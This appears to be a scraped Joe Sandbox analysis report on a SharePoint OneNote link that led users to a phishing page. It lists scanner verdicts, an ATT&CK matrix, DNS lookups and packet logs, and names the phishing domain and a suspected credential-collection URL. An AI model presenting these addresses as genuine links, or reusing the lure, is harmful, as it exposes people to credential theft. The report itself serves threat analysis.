    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    2
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
    Non-Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration5
    Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
    Ingress Tool Transfer
    SIM Card SwapCarrier Billing Fraud
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://insacentre-my.sharepoint.com/:o:/g/personal/christel_chevereau_insa-cvl_fr/EiRzYlzmtGdJoxpcLidnoqABdW_125MBX4mxznGrm93yrA?e=ErmP6W0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://byzo.pages.dev/100%SlashNextCredential Stealing type: Phishing & Social Engineering
    https://amcdn.msftauth.net/me?partner=OneNoteOnline&version=10.22108.2&market=FR-FR&wrapperId=suiteshell0%Avira URL Cloudsafe
    https://insacentre-my.sharepoint.com/personal/christel_chevereau_insa-cvl_fr/_layouts/15/Doc.aspx?sourcedoc=%7B5c627324-b4e6-4967-a31a-5c2e2767a2a0%7D&action=default&slrid=e6036ba0-60ed-5000-3b56-ec6f32cafafb&originalPath=aHR0cHM6Ly9pbnNhY2VudHJlLW15LnNoYXJlcG9pbnQuY29tLzpvOi9nL3BlcnNvbmFsL2NocmlzdGVsX2NoZXZlcmVhdV9pbnNhLWN2bF9mci9FaVJ6WWx6bXRHZEpveHBjTGlkbm9xQUJkV18xMjVNQlg0bXh6bkdybTkzeXJBP3J0aW1lPTNTSGZoa1NsMmtn&cid=b4d974bd-1cf6-430c-b9ae-4dde6b87b7da0%Avira URL Cloudsafe
    https://byzo.pages.dev/favicon.ico0%Avira URL Cloudsafe
    https://byzo.pages.dev/0%VirustotalBrowse
    https://kccarpetsandfloorings.com/huest/test.php0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    b-0016.b-msedge.net
    13.107.6.171
    truefalse
      unknown
      kccarpetsandfloorings.com
      68.65.120.250
      truefalse
        unknown
        i-dub01p-cor003.api.p001.1drv.com
        40.90.128.21
        truefalse
          high
          accounts.google.com
          142.250.203.109
          truefalse
            high
            part-0032.t-0009.t-msedge.net
            13.107.246.60
            truefalse
              unknown
              www.google.com
              142.250.203.100
              truefalse
                high
                clients.l.google.com
                142.250.203.110
                truefalse
                  high
                  byzo.pages.dev
                  188.114.97.3
                  truefalse
                    unknown
                    dual-spo-0004.spo-msedge.net
                    13.107.136.9
                    truefalse
                      unknown
                      onenoteonlinesync.onenote.com
                      unknown
                      unknownfalse
                        high
                        augloop.office.com
                        unknown
                        unknownfalse
                          high
                          storage.live.com
                          unknown
                          unknownfalse
                            high
                            ajax.aspnetcdn.com
                            unknown
                            unknownfalse
                              high
                              clients2.google.com
                              unknown
                              unknownfalse
                                high
                                insacentre-my.sharepoint.com
                                unknown
                                unknownfalse
                                  unknown
                                  amcdn.msftauth.net
                                  unknown
                                  unknownfalse
                                    unknown
                                    spoprod-a.akamaihd.net
                                    unknown
                                    unknownfalse
                                      high
                                      www.onenote.com
                                      unknown
                                      unknownfalse
                                        high
                                        messaging.engagement.office.com
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          https://insacentre-my.sharepoint.com/personal/christel_chevereau_insa-cvl_fr/_layouts/15/Doc.aspx?sourcedoc={5c627324-b4e6-4967-a31a-5c2e2767a2a0}&action=view&wd=target%28SPRECHER%20AG.one%7C4af76c2d-7b46-4be7-8c10-3c777d3ccd90%2FSPRECHER%20AG%7Ce1b01870-4c86-4aa6-abd5-d2ff398d2087%2F%29&wdorigin=NavigationUrlfalse
                                            unknown
                                            https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                                              high
                                              https://amcdn.msftauth.net/me?partner=OneNoteOnline&version=10.22108.2&market=FR-FR&wrapperId=suiteshellfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://byzo.pages.dev/true
                                              • 0%, Virustotal, Browse
                                              • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                              unknown
                                              https://byzo.pages.dev/true
                                              • 0%, Virustotal, Browse
                                              • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                              unknown
                                              https://insacentre-my.sharepoint.com/personal/christel_chevereau_insa-cvl_fr/_layouts/15/Doc.aspx?sourcedoc=%7B5c627324-b4e6-4967-a31a-5c2e2767a2a0%7D&action=default&slrid=e6036ba0-60ed-5000-3b56-ec6f32cafafb&originalPath=aHR0cHM6Ly9pbnNhY2VudHJlLW15LnNoYXJlcG9pbnQuY29tLzpvOi9nL3BlcnNvbmFsL2NocmlzdGVsX2NoZXZlcmVhdV9pbnNhLWN2bF9mci9FaVJ6WWx6bXRHZEpveHBjTGlkbm9xQUJkV18xMjVNQlg0bXh6bkdybTkzeXJBP3J0aW1lPTNTSGZoa1NsMmtn&cid=b4d974bd-1cf6-430c-b9ae-4dde6b87b7dafalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://byzo.pages.dev/favicon.icotrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://kccarpetsandfloorings.com/huest/test.phpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                142.250.203.110
                                                clients.l.google.comUnited States
                                                15169GOOGLEUSfalse
                                                13.107.136.9
                                                dual-spo-0004.spo-msedge.netUnited States
                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                13.107.6.171
                                                b-0016.b-msedge.netUnited States
                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                13.107.246.60
                                                part-0032.t-0009.t-msedge.netUnited States
                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                142.250.203.109
                                                accounts.google.comUnited States
                                                15169GOOGLEUSfalse
                                                68.65.120.250
                                                kccarpetsandfloorings.comUnited States
                                                22612NAMECHEAP-NETUSfalse
                                                142.250.203.100
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                40.90.128.21
                                                i-dub01p-cor003.api.p001.1drv.comUnited States
                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                239.255.255.250
                                                unknownReserved
                                                unknownunknownfalse
                                                188.114.97.3
                                                byzo.pages.devEuropean Union
                                                13335CLOUDFLARENETUSfalse
                                                IP
                                                192.168.2.1
                                                192.168.2.7
                                                127.0.0.1
                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                Analysis ID:715053
                                                Start date and time:2022-10-03 15:37:12 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 6m 41s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Cookbook file name:browseurl.jbs
                                                Sample URL:https://insacentre-my.sharepoint.com/:o:/g/personal/christel_chevereau_insa-cvl_fr/EiRzYlzmtGdJoxpcLidnoqABdW_125MBX4mxznGrm93yrA?e=ErmP6W
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:14
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal56.phis.win@31/0@17/13
                                                EGA Information:Failed
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Browse: https://byzo.pages.dev/
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded IPs from analysis (whitelisted): 142.250.203.99, 23.50.105.163, 34.104.35.123, 23.213.166.134, 23.213.164.142, 13.69.109.131, 52.109.88.136, 52.109.88.191, 172.217.168.74, 142.250.203.106, 216.58.215.234, 172.217.168.10, 172.217.168.42, 51.104.15.253, 80.67.82.219, 80.67.82.209, 52.109.76.126, 52.111.231.2, 20.190.160.23, 40.126.32.73, 40.126.32.69, 20.190.160.13, 40.126.32.137, 40.126.32.139, 20.190.160.15, 40.126.32.132, 23.50.106.206, 152.199.19.160, 2.19.66.81, 52.111.231.8, 52.109.88.139
                                                • Excluded domains from analysis (whitelisted): e2682.g.akamaiedge.net, osiprod-weu-celadon-000.westeurope.cloudapp.azure.com, c1-wildcard.cdn.office.net-c.edgekey.net.globalredir.akadns.net, clientservices.googleapis.com, res-1.cdn.office.net, browser.events.data.trafficmanager.net, appsforoffice.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, www.tm.a.prd.aadg.trafficmanager.net, cdn.onenote.net.edgekey.net, prod-campaignaggregator.omexexternallfb.office.net.akadns.net, star-azurefd-prod.trafficmanager.net, login.live.com, e16604.g.akamaiedge.net, update.googleapis.com, officeclient.microsoft.com, onenoteonlinesync.onenote.trafficmanager.net, fs.microsoft.com, content-autofill.googleapis.com, osiprod-neu-celadon-000.northeurope.cloudapp.azure.com, reverseproxy.onenote.trafficmanager.net, onedscolprdweu03.westeurope.cloudapp.azure.com, e19254.dscg.akamaiedge.net, edgedl.me.gvt1.com, a1531.g2.akamai.net, e1553.dspg.akamaiedge.net, spoprod-a.akamaihd.net.edgesuite.net, res-1.cdn.office.net-c.ed
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtWriteFile calls found.
                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                No simulations
                                                No context
                                                No context
                                                No context
                                                No context
                                                No context
                                                No created / dropped files found
                                                No static file info
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 3, 2022 15:38:15.592576027 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:15.592609882 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:15.592681885 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:15.593458891 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:15.593497992 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:15.593554020 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:15.593888044 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:15.593904972 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:15.594453096 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:15.594471931 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:15.694417953 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:15.715240002 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:15.751754999 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:15.767802000 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:15.987816095 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:15.987870932 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:15.988527060 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:15.988580942 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:15.990149021 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:15.990222931 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:15.990386009 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:15.990772963 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:15.990802050 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:15.990837097 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:15.990844011 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:15.990890980 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:15.990919113 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:15.994956017 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:15.995186090 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:15.998274088 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:15.998327017 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.051798105 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:16.104141951 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.123250008 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.123295069 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.127259016 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.127393007 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.375494003 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:16.375533104 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:16.375757933 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:16.376730919 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:16.376759052 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:16.377315998 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:16.377367973 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:16.377441883 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:16.377454996 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:16.377603054 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.377629042 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.377677917 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:16.377811909 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.377918005 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.377928972 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.412137985 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:16.412221909 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:16.412264109 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:16.412430048 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:16.412487030 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:16.414124012 CEST49704443192.168.2.3142.250.203.110
                                                Oct 3, 2022 15:38:16.414167881 CEST44349704142.250.203.110192.168.2.3
                                                Oct 3, 2022 15:38:16.429208040 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:16.429275036 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:16.429300070 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:16.429532051 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:16.429594994 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:16.430577040 CEST49707443192.168.2.3142.250.203.109
                                                Oct 3, 2022 15:38:16.430602074 CEST44349707142.250.203.109192.168.2.3
                                                Oct 3, 2022 15:38:16.451868057 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.451922894 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.551815987 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.597070932 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.597098112 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.597259998 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.597311974 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.597343922 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.598265886 CEST49709443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.598308086 CEST4434970913.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.626389980 CEST49711443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.626452923 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.626537085 CEST49711443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.626846075 CEST49711443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.626868010 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.724427938 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.729661942 CEST49711443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.729727983 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.730830908 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.731368065 CEST49711443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.731415987 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.731605053 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.731890917 CEST49711443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.731930971 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.888422966 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.888482094 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.888545036 CEST49711443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.888578892 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.888605118 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.888607025 CEST49711443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.888665915 CEST49711443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.888674021 CEST4434971113.107.136.9192.168.2.3
                                                Oct 3, 2022 15:38:16.888700962 CEST49711443192.168.2.313.107.136.9
                                                Oct 3, 2022 15:38:16.888700962 CEST4434971113.107.136.9192.168.2.3
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 3, 2022 15:38:15.538768053 CEST5692453192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:15.538923025 CEST4930253192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:15.539288044 CEST5397553192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:15.564954042 CEST53539758.8.8.8192.168.2.3
                                                Oct 3, 2022 15:38:15.566214085 CEST53493028.8.8.8192.168.2.3
                                                Oct 3, 2022 15:38:16.964281082 CEST5713453192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:16.982084036 CEST53571348.8.8.8192.168.2.3
                                                Oct 3, 2022 15:38:18.274236917 CEST5770453192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:34.832695007 CEST5958153192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:35.356872082 CEST5304953192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:35.455265045 CEST6008853192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:35.667603970 CEST6356253192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:35.780847073 CEST6551153192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:36.669471979 CEST5207953192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:47.465084076 CEST5415353192.168.2.38.8.8.8
                                                Oct 3, 2022 15:38:47.502764940 CEST53541538.8.8.8192.168.2.3
                                                Oct 3, 2022 15:38:50.063019037 CEST6412153192.168.2.38.8.8.8
                                                Oct 3, 2022 15:39:02.970662117 CEST5937453192.168.2.38.8.8.8
                                                Oct 3, 2022 15:39:03.025917053 CEST53593748.8.8.8192.168.2.3
                                                Oct 3, 2022 15:39:42.020576954 CEST5782453192.168.2.38.8.8.8
                                                Oct 3, 2022 15:39:56.082808971 CEST6041853192.168.2.38.8.8.8
                                                Oct 3, 2022 15:40:17.087985992 CEST4941953192.168.2.38.8.8.8
                                                Oct 3, 2022 15:40:17.105978012 CEST53494198.8.8.8192.168.2.3
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 3, 2022 15:38:15.538768053 CEST192.168.2.38.8.8.80x69eStandard query (0)insacentre-my.sharepoint.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.538923025 CEST192.168.2.38.8.8.80x6f7fStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.539288044 CEST192.168.2.38.8.8.80xe86Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:16.964281082 CEST192.168.2.38.8.8.80xea07Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:18.274236917 CEST192.168.2.38.8.8.80x5865Standard query (0)onenoteonlinesync.onenote.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:34.832695007 CEST192.168.2.38.8.8.80xc581Standard query (0)amcdn.msftauth.netA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.356872082 CEST192.168.2.38.8.8.80xf41eStandard query (0)spoprod-a.akamaihd.netA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.455265045 CEST192.168.2.38.8.8.80x9b4bStandard query (0)storage.live.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.667603970 CEST192.168.2.38.8.8.80xb48bStandard query (0)www.onenote.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.780847073 CEST192.168.2.38.8.8.80xc100Standard query (0)augloop.office.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:36.669471979 CEST192.168.2.38.8.8.80x4a4bStandard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:47.465084076 CEST192.168.2.38.8.8.80x88a1Standard query (0)byzo.pages.devA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:50.063019037 CEST192.168.2.38.8.8.80xe3e8Standard query (0)messaging.engagement.office.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:39:02.970662117 CEST192.168.2.38.8.8.80xbde6Standard query (0)kccarpetsandfloorings.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:39:42.020576954 CEST192.168.2.38.8.8.80x9aadStandard query (0)www.onenote.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:39:56.082808971 CEST192.168.2.38.8.8.80x8c49Standard query (0)augloop.office.comA (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:40:17.087985992 CEST192.168.2.38.8.8.80x9b2aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 3, 2022 15:38:15.564954042 CEST8.8.8.8192.168.2.30xe86No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.564954042 CEST8.8.8.8192.168.2.30xe86No error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.566214085 CEST8.8.8.8192.168.2.30x6f7fNo error (0)accounts.google.com142.250.203.109A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.644069910 CEST8.8.8.8192.168.2.30x69eNo error (0)insacentre-my.sharepoint.cominsacentre.sharepoint.comCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.644069910 CEST8.8.8.8192.168.2.30x69eNo error (0)insacentre.sharepoint.com4175-ipv4e.clump.dprodmgd104.aa-rt.sharepoint.comCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.644069910 CEST8.8.8.8192.168.2.30x69eNo error (0)4175-ipv4e.clump.dprodmgd104.aa-rt.sharepoint.com189271-ipv4e.farm.dprodmgd104.aa-rt.sharepoint.comCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.644069910 CEST8.8.8.8192.168.2.30x69eNo error (0)189271-ipv4e.farm.dprodmgd104.aa-rt.sharepoint.com189271-ipv4e.farm.dprodmgd104.sharepointonline.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.644069910 CEST8.8.8.8192.168.2.30x69eNo error (0)189271-ipv4.farm.dprodmgd104.aa-rt.sharepoint.com.dual-spo-0004.spo-msedge.netdual-spo-0004.spo-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.644069910 CEST8.8.8.8192.168.2.30x69eNo error (0)dual-spo-0004.spo-msedge.net13.107.136.9A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:15.644069910 CEST8.8.8.8192.168.2.30x69eNo error (0)dual-spo-0004.spo-msedge.net13.107.138.9A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:16.982084036 CEST8.8.8.8192.168.2.30xea07No error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:16.984251022 CEST8.8.8.8192.168.2.30x2385No error (0)euc-onenote.wac.trafficmanager.net.b-0016.b-dc-msedge.net.b-0016.b-msedge.netb-0016.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:16.984251022 CEST8.8.8.8192.168.2.30x2385No error (0)b-0016.b-msedge.net13.107.6.171A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:18.297940016 CEST8.8.8.8192.168.2.30x5865No error (0)onenoteonlinesync.onenote.comonenoteonlinesync.onenote.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:34.852715969 CEST8.8.8.8192.168.2.30xc581No error (0)amcdn.msftauth.netmecontrol-prod.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:34.852715969 CEST8.8.8.8192.168.2.30xc581No error (0)mecontrol-prod.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:34.852715969 CEST8.8.8.8192.168.2.30xc581No error (0)dual.part-0032.t-0009.t-msedge.netpart-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:34.852715969 CEST8.8.8.8192.168.2.30xc581No error (0)part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
